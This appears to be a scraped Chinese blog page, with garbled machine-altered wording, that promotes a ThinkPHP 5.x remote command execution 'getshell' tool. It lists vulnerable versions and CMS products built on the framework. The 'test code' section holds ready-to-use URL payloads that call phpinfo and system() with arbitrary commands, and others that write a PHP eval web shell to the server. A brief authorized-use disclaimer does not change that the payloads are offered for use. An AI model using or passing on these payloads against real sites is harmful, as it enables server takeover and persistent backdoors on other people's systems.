首页 » Web前端 » filterinputphp技巧_ThinkPHP 5x远程敕令实行测试对象可getshell

filterinputphp技巧_ThinkPHP 5x远程敕令实行测试对象可getshell

访客 2024-11-19 0

扫一扫用手机浏览

文章目录 [+]

该工具只能授权验证网站漏洞和站长验证漏洞利用。

禁止用于未授权测试,造孽入侵,否则统统后果自大,和作者无关。

filterinputphp技巧_ThinkPHP 5x远程敕令实行测试对象可getshell

影响范围

filterinputphp技巧_ThinkPHP 5x远程敕令实行测试对象可getshell
(图片来自网络侵删)
5.x < 5.1.315.x <= 5.0.23

以下基于ThinkPHP5 二次开拓的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。

AdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdmineyoucmsLarryCMS后台管理系统tpadmin后台管理系统snake后台管理系统ThinkSNSDolphinPHP后台管理系统WeMall商城系统CLTPHP齐博CMSDSMALLYFCMFHisiPHP后台管理系统Tplay后台管理系统lyadmin后台管理系统haoid后台管理系统

漏洞验证

命令实行

getshell

下载地址:私信我关键字“getshell”自动获取下载链接

附上测试代码

#代码实行?s=index/\think\Request/input&filter=phpinfo&data=1#命令实行?s=index/\think\Request/input&filter=system&data=系统命令#getshell?s=index/\think\template\driver\file/write&cacheFile=paylog.php&content=%3C?php%20eval($_POST[20208]);?%3Ehacker#getshell2?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E#代码实行?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令实行?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令#代码实行?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令实行?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令

相关文章

房山第一探寻历史文化名区的魅力与发展

房山区,位于北京市西南部,历史悠久,文化底蕴深厚。作为北京市的一个重要组成部分,房山区的发展始终与首都的发展紧密相连。房山区积极推...

Web前端 2025-02-18 阅读0 评论0

手机话费开钻代码数字时代的便捷生活

我们的生活越来越离不开手机。手机话费作为手机使用过程中的重要组成部分,其充值方式也在不断创新。手机话费开钻代码应运而生,为用户提供...

Web前端 2025-02-18 阅读0 评论0

探寻专业奥秘如何查询自己专业的代码

计算机科学已成为当今社会不可或缺的一部分。掌握一门专业代码对于个人发展具有重要意义。面对繁杂的学科体系,如何查询自己专业的代码成为...

Web前端 2025-02-18 阅读0 评论0